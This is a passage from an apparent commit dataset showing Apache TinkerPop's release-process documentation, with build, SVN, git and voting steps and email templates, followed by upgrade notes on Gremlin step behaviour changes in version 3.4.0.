\/bin\/bash<\/code>]\n.. `cd ..; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Execute `bin\/validate-distribution.sh` and any other relevant testing.\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. Perform JIRA administration tasks:\n.. \"Release\" the current version and set the \"release date\"\n.. If there is to be a follow-on release in the current line of code, create that new version specifying the \"start date\"\n. Prepare Git administration tasks. Note that this work can be performed at the release manager's discretion. It may be wise to wait until a successful VOTE is imminent before reopening development. Apply the following steps as needed per release branch:\n.. Make the appropriate branching changes as required by the release and bump the version to `SNAPSHOT` with\n`mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false`.\n.. `mvn clean install -DskipTests` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n.. `mvn deploy` - deploy the new `SNAPSHOT`\n.. `bin\/process-docs.sh` and validate the generated `SNAPSHOT` documentation locally\n.. `bin\/publish-docs.sh <username>` to publish the `SNAPSHOT` docs, which enables the README to work properly.\n.. Update the links in the `README.asciidoc` to point at the `SNAPSHOT` version.\n.. Commit and push the `SNAPSHOT` changes to git\n.. Send email to advise that code freeze is lifted.\n.. Generate a list of dead branches that will be automatically deleted and post them as a DISCUSS thread for review, then once consensus is reached, remove those branches.
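 One possible starting point (illustrative, not prescribed by this process) is `git branch -r --merged master`, which lists remote branches already fully merged into `master`.\n. 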
Submit for `[VOTE]` at `dev@tinkerpop.apache.org` (see email template below)\n. *Wait for vote acceptance* (72 hours)\n\nRelease & Promote\n-----------------\n\n. Login to link:https:\/\/repository.apache.org\/[Apache Nexus] and release the previously closed repository.\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop dev; svn up dev\/xx.yy.zz`\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/release\/tinkerpop release; mkdir release\/xx.yy.zz`\n. Copy release files from `dev\/xx.yy.zz` to `release\/xx.yy.zz`.\n. `cd release; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Update homepage with references to latest distribution and to other internal links elsewhere on the page.\n. Wait for Apache Central to sync the jars and src (link:http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/[http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/]).\n. If there are releases present in SVN that represent lines of code that are no longer under development, then remove those releases. In other words, if `3.2.0` is present and `3.2.1` is released then remove `3.2.0`. However, if `3.1.3` is present and that line of code is still under potential development, it may stay.\n. Announce release on `dev@`\/`gremlin-users@` mailing lists and tweet from `@apachetinkerpop`\n\nEmail Templates\n---------------\n\nRelease VOTE\n~~~~~~~~~~~~\n\n```\nSubject: [VOTE] TinkerPop xx.yy.zz Release\n\nHello,\n\nWe are happy to announce that TinkerPop xx.yy.zz is ready for release.\n\nThe release artifacts can be found at this location:\n\thttps:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/xx.yy.zz\/\n\nThe source distribution is provided by:\n\tapache-tinkerpop-xx.yy.zz-src.zip\n\nTwo binary distributions are provided for user convenience:\n\tapache-gremlin-console-xx.yy.zz-bin.zip\n\tapache-gremlin-server-xx.yy.zz-bin.zip\n\nThe GPG key used to sign the release artifacts is available at:\n https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/KEYS\n\nThe online docs can be found here:\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade\/ (upgrade docs)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\n\nThe tag in Apache Git can be found here:\n\thttps:\/\/git-wip-us.apache.org\/repos\/asf?p=tinkerpop.git;XXXXXXXXXXXXXXXXXX\n\nThe release notes are available here:\n\thttps:\/\/github.com\/apache\/tinkerpop\/blob\/master\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe [VOTE] will be open for the next 72 hours --- closing <DayOfTheWeek> (<Month> <Day> <Year>) at <Time> <TimeZone>.\n\nMy vote is +1.\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nDev Release RESULT VOTE\n~~~~~~~~~~~~~~~~~~~~~~~\n\n```\nSubject: [RESULT][VOTE] TinkerPop xx.yy.zz Release\n\nThis vote is now closed with a total of X +1s, no +0s and no -1s. The results are:\n\nBINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nNON-BINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nGeneral Release Announcement\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSubject: TinkerPop xx.yy.zz Released: [name of release line]\n\nHello,\n\nTinkerPop xx.yy.zz has just been released. [some text to introduce the release - e.g. 
whether or not\nthere is breaking change, an important game-changing feature or two, etc.]\n\nThe release artifacts can be found at this location:\n\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-console-xx.yy.zz-bin.zip\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-server-xx.yy.zz-bin.zip\n\nThe online docs can be found here:\n\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade.html#XXXXXXXXXXXXXXXXXX (upgrade docs)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/some-new-content\/ (some new content) [NEW!]\n\nThe release notes are available here:\n\nhttps:\/\/github.com\/apache\/tinkerpop\/blob\/xx.yy.zz\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe Central Maven repo has sync'd as well:\n\nhttps:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/\n\n[include the release line logo]\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nRelease Process\n===============\n\nThis document describes the steps required to release a version of TinkerPop. The release is handled by a \"release\nmanager\" (a committer fulfills this role), who ensures that the steps in this document are executed. The process is\nmulti-phased and can therefore take several weeks to complete given the time needed for Apache voting and community\nfeedback. Once a release point has been identified, the following phases represent the flow of \"release\":\n\n* Pre-flight check.\n* Optionally, produce a release candidate for community feedback.\n* Submit the official release for PMC vote.\n* Release and promote.\n\nNOTE: It might be helpful to use this document as generated from the currently release as opposed to one generate\nfrom a previous version or from recent `SNAPSHOT`. When using one generated for release, all the \"versions\" in the\ncommands end up being set to the version that is being released, making cut and paste of those commands less labor\nintensive and error prone.\n\nPre-flight Check\n----------------\n\nThe \"pre-flight check\" is a list of things performed by the release manager during the weeks leading up to a scheduled\nday to release. These checks will help to ensure that that release day goes smoothly by identifying problems up early\nand communicating with other members of the community.\n\n. Fourteen days before release, issue an email to the dev mailing list to remind the community of the pending release.\n.. Note any important issues open in JIRA in that post.\n.. Request review and update of the \"upgrade documentation\" and CHANGELOG.\n. 
Seven days before release, announce the code freeze on the dev mailing list to remind the community that the branch\nunder release is protected. Tweaks to documentation and other odds and ends related to release are still allowed\nduring this period.\n. At some point during the week:\n.. Run the full integration test suite: `mvn clean install -DskipIntegrationTests=false -DincludeNeo4j`\n.. Deploy a final SNAPSHOT to the snapshot repository.\n.. Review LICENSE and NOTICE files to make sure that no <<dependencies,changes are needed>>.\n.. Review javadoc filters on the \"Core API\" docs to be sure nothing needs to change.\n.. Review JIRA tickets in the release and ensure that:\n... All tickets categorized by having a \"Component\" assigned.\n... All tickets are either of type \"Bug\" or \"Enhancement\".\n... All tickets where work was completed are \"Closed\"\n.... Search for \"closed the pull request\" in comments for hints on possible tickets that were left open by mistake).\n.... Look for tickets marked as \"Resolved\" (some users might not have rights to mark as \"Closed\" - convert these to \"Closed\".\n. When all documentation changes are in place, use `bin\/publish-docs.sh` to deploy a final `SNAPSHOT` representation\nof the docs and thus validate that there are no issues with the documentation generation process. Request review\nof the published documentation on the dev mailing list.\n\nRelease Candidate\n-----------------\n\nA release candidate is an unofficial release that is represented by a tagged version in the Git repository. It is\noffered in cases where there is significant change in a particular version and the potential for upgrades and problems\nmight be high.\n\n. `mvn clean install -DincludeNeo4j`\n.. `mvn verify -DskipIntegrationTests=false -DincludeNeo4j`\n.. `mvn verify -DskipPerformanceTests=false`\n. `bin\/publish-docs.sh <username>` - note that under a release candidate the documentation is published as SNAPSHOT\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update the project files to reference a non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and `git push`\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. `mvn clean install`\n. `mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false` to go back to SNAPSHOT\n. `git commit -a -m \"Returned to xx.yy.zz-SNAPSHOT\"` and `git push`\n. Announce the release candidate to `dev` mailing list and await feedback\n. Repeat as required or proceed to the next phase\n\nPMC Vote\n--------\n\nA positive vote for a particular release from the TinkerPop PMC is required to move to the following phase.\n\n. By this point, the testing performed during the code freeze should have validated the release. If however there\nare additional tests to perform that the release manager feels are relevant, they should be performed now. In other\nwords, there is no need to rebuild the `SNAPSHOT` yet another time unless there are circumstances that would call its\nvalidity into question.\n. Update `CHANGELOG.asciidoc`:\n.. Update the release date\n.. Generate the JIRA release notes report for the current version and append them to the `CHANGELOG.asciidoc`.\n... Use an \"advanced\" search to filter out JIRA issues already released on other versions. For example: `fixVersion\n= 3.1.0-incubating AND fixVersion not in (3.0.2-incubating, 3.0.1-incubating)`.\n... 
Consider use of an \"Excel\" export to organize, sort (by type and then id) and prepare the JIRA tickets to be pasted to `CHANGELOG.asciidoc`\n... Be sure to include a link to other versions in the `CHANGELOG.asciidoc` that were previously released while the\ncurrent release was under development as this new release will have those changes included within it. Please see\n3.1.0-incubating or 3.2.0-incubating for an example.\n.. Organize \"breaking\" changes to be clearly marked (use JIRA and the \"breaking\" label to identify those)\n. Update \"upgrade documentation\":\n.. Update the release date.\n.. Update the link to CHANGELOG.asciidoc\n. `mvn versions:set -DnewVersion=xx.yy.zz -DgenerateBackupPoms=false` to update project files to reference the non-SNAPSHOT version\n. `git diff` and review the updated files (expect all `pom.xml` files and this README)\n. `git commit -a -m \"TinkerPop xx.yy.zz release\"` and push\n. `mvn clean install` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n. `bin\/process-docs.sh` and validate the generated documentation locally (don't rely on \"SUCCESS\" - scroll up through logs to ensure there were no errors and view the HTML directly)\n. `bin\/publish-docs.sh <username>` - Note that this step requires no additional processing as the previous step.\nhandled document generation and this step now merely needs to upload what was generated.\n. `mvn deploy -Papache-release -DcreateChecksum=true -DskipTests` - deploy signed artifacts with checksums to link:https:\/\/repository.apache.org\/[Apache Nexus]. Review (artifacts versions, file sizes, anything that might be out of place - request another committer to review as well).\n. Review generated artifacts to be sure they have both javadocs and asciidocs present then \"close\" the repo - if the repo is left open it will be automatically dropped after five days and closing the repo will allow it to stay available for a full ninety days which is more than enough time to complete a vote. Do NOT \"release\" the repository at this time.\n. Upload artifacts to `https:\/\/dist.apache.org\/repos\/dist\/dev\/\/tinkerpop` for `[VOTE]` review.\n.. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/\/tinkerpop\/ dev` and `mkdir dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-console\/xx.yy.zz\/gremlin-console-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/gremlin-server\/xx.yy.zz\/gremlin-server-xx.yy.zz-distribution.zip* dev\/xx.yy.zz`\n.. `cp ~\/.m2\/repository\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/tinkerpop-xx.yy.zz-source-release.zip* dev\/xx.yy.zz`\n.. `cd dev\/xx.yy.zz`\n.. pass:[<code>ls * | xargs -n1 -I {} echo \"mv apache-{} {}\" | sed -e 's\/distribution\/bin\/' -e 's\/source-release\/src\/' -e s'\/^\\(.*\\) \\(.*\\) \\(.*\\)$\/\\1 \\3 \\2\/' | \/bin\/bash<\/code>]\n.. `cd ..; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Execute `bin\/validate-distribution.sh` and any other relevant testing.\n. `git tag -a -m \"TinkerPop xx.yy.zz release\" xx.yy.zz` and `git push --tags`\n. Perform JIRA administration tasks:\n.. \"Release\" the current version and set the \"release date\"\n.. If there is to be a follow on release in the current line of code, create that new version specifying the \"start date\"\n. Prepare Git administration tasks. Note that this work can be performed at the release manager's discretion. 
It may be wise to wait until a successful VOTE is eminent before reopening development. Apply the following steps as needed per release branch:\n.. Make the appropriate branching changes as required by the release and bump the version to `SNAPSHOT` with\n`mvn versions:set -DnewVersion=xx.yy.zz-SNAPSHOT -DgenerateBackupPoms=false`.\n.. `mvn clean install -DskipTests` - need to build first so that the right version of the console is used with `bin\/publish-docs.sh`\n.. `mvn deploy` - deploy the new `SNAPSHOT`\n.. `bin\/process-docs.sh` and validate the generated `SNAPSHOT` documentation locally\n.. `bin\/publish-docs.sh <username>` to publish the `SNAPSHOT` docs which enables the README to work properly.\n.. Update the links in the `README.asciidoc` to point at the `SNAPSHOT` version.\n.. Commit and push the `SNAPSHOT` changes to git\n.. Send email to advise that code freeze is lifted.\n.. Generate a list of dead branches that will be automatically deleted and post them as a DISCUSS thread for review, then once consensus is reached removed those branches.\n. Submit for `[VOTE]` at `dev@tinkerpop.apache.org` (see email template below)\n. *Wait for vote acceptance* (72 hours)\n\nRelease & Promote\n-----------------\n\n. Login to link:https:\/\/repository.apache.org\/[Apache Nexus] and release the previously closed repository.\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop dev; svn up dev\/xx.yy.zz`\n. `svn co --depth empty https:\/\/dist.apache.org\/repos\/dist\/release\/tinkerpop release; mkdir release\/xx.yy.zz`\n. Copy release files from `dev\/xx.yy.zz` to `release\/xx.yy.zz`.\n. `cd release; svn add xx.yy.zz\/; svn ci -m \"TinkerPop xx.yy.zz release\"`\n. Update homepage with references to latest distribution and to other internal links elsewhere on the page.\n. Wait for Apache Central to sync the jars and src (link:http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/[http:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/]).\n. If there are releases present in SVN that represents lines of code that are no longer under development, then remove those releases. In other words, if `3.1.0-incubating` is present and `3.1.1-incubating` is released then remove `3.1.0-incubating`. However, if `3.0.2-incubating` is present and that line of code is still under potential development, it may stay.\n. 
Announce release on `dev@`\/`gremlin-users@` mailing lists and tweet from `@apachetinkerpop`\n\nEmail Templates\n---------------\n\nRelease VOTE\n~~~~~~~~~~~~\n\n```\nSubject: [VOTE] TinkerPop xx.yy.zz Release\n\nHello,\n\nWe are happy to announce that TinkerPop xx.yy.zz is ready for release.\n\nThe release artifacts can be found at this location:\n\thttps:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/xx.yy.zz\/\n\nThe source distribution is provided by:\n\tapache-tinkerpop-xx.yy.zz-src.zip\n\nTwo binary distributions are provided for user convenience:\n\tapache-gremlin-console-xx.yy.zz-bin.zip\n\tapache-gremlin-server-xx.yy.zz-bin.zip\n\nThe GPG key used to sign the release artifacts is available at:\n https:\/\/dist.apache.org\/repos\/dist\/dev\/tinkerpop\/KEYS\n\nThe online docs can be found here:\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\n\thttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade\/ (upgrade docs)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\n\thttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\n\nThe tag in Apache Git can be found here:\n\thttps:\/\/git-wip-us.apache.org\/repos\/asf?p=tinkerpop.git;XXXXXXXXXXXXXXXXXX\n\nThe release notes are available here:\n\thttps:\/\/github.com\/apache\/tinkerpop\/blob\/master\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe [VOTE] will be open for the next 72 hours --- closing <DayOfTheWeek> (<Month> <Day> <Year>) at <Time> <TimeZone>.\n\nMy vote is +1.\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nDev Release RESULT VOTE\n~~~~~~~~~~~~~~~~~~~~~~~\n\n```\nSubject: [RESULT][VOTE] TinkerPop xx.yy.zz Release\n\nThis vote is now closed with a total of X +1s, no +0s and no -1s. The results are:\n\nBINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nNON-BINDING VOTES:\n\n+1 (X -- list of voters)\n0 (0)\n-1 (0)\n\nThank you very much,\n<TinkerPop Committer Name>\n```\n\nGeneral Release Announcement\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSubject: TinkerPop xx.yy.zz Released: [name of release line]\n\nHello,\n\nTinkerPop xx.yy.zz has just been released. [some text to introduce the release - e.g. 
whether or not\nthere is breaking change, an important game-changing feature or two, etc.]\n\nThe release artifacts can be found at this location:\n\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-console-xx.yy.zz-bin.zip\nhttps:\/\/www.apache.org\/dyn\/closer.lua\/tinkerpop\/xx.yy.zz\/apache-gremlin-server-xx.yy.zz-bin.zip\n\nThe online docs can be found here:\n\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/reference\/ (user docs)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/upgrade.html#XXXXXXXXXXXXXXXXXX (upgrade docs)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/core\/ (core javadoc)\nhttp:\/\/tinkerpop.apache.org\/javadocs\/xx.yy.zz\/full\/ (full javadoc)\nhttp:\/\/tinkerpop.apache.org\/docs\/xx.yy.zz\/some-new-content\/ (some new content) [NEW!]\n\nThe release notes are available here:\n\nhttps:\/\/github.com\/apache\/tinkerpop\/blob\/xx.yy.zz\/CHANGELOG.asciidoc#XXXXXXXXXXXXXXXXXX\n\nThe Central Maven repo has sync'd as well:\n\nhttps:\/\/repo1.maven.org\/maven2\/org\/apache\/tinkerpop\/tinkerpop\/xx.yy.zz\/\n\n[include the release line logo]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abc11c8720b2eeb25163fdc1d9e86f0b4ab07d6f","subject":"added a note in upgrade docs regarding the change of order of select scopes","message":"added a note in upgrade docs regarding the change of order of select scopes\n","repos":"apache\/tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nNEED AN IMAGE\n\n*NOT NAMED YET*\n\n== TinkerPop 3.4.0\n\n*NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Modifications to reducing barrier steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input. 
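For example (console output is illustrative), such a traversal now simply terminates without emitting anything:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\ngremlin>\n----\n\n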
Previously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these steps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in the result. In order to get the same result as before, one would\nhave to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Change in order of select() scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths\nPreviously the order was: side-effects, maps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name existed.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one would expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nNEED AN IMAGE\n\n*NOT NAMED YET*\n\n== TinkerPop 3.4.0\n\n*NOT OFFICIALLY RELEASED YET*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== Modifications to reducing barrier steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input. Previously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these steps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in the result. In order to get the same result as before, one would\nhave to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> \ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bc9b6f5e49334173410bbc2ddc80884ee96ce63","subject":"Restructured upgrade docs for 3.4.0","message":"Restructured upgrade docs for 3.4.0\n\nMoved all deprecation\/removal sections under a single heading and retitled some of the sections. CTR\n","repos":"krlohnes\/tinkerpop,apache\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. 
You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\n= TinkerPop 3.4.0\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/tinkerpop\/master\/docs\/static\/images\/avant-gremlin.png[width=225]\n\n*Avant-Gremlin Construction #3 for Theremin and Flowers*\n\n== TinkerPop 3.4.0\n\n*Release Date: January 2, 2019*\n\nPlease see the link:https:\/\/github.com\/apache\/tinkerpop\/blob\/3.4.0\/CHANGELOG.asciidoc#release-3-4-0[changelog] for a complete list of all the modifications that are part of this release.\n\n=== Upgrading for Users\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . ?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in\nparallel which should lead to better utilization of connections. The `ConnectionPool` now also has a fixed size\nwhereas it could previously create an unlimited number of connections. Each `Connection` can handle up to\n`MaxInProcessPerConnection` requests in parallel. 
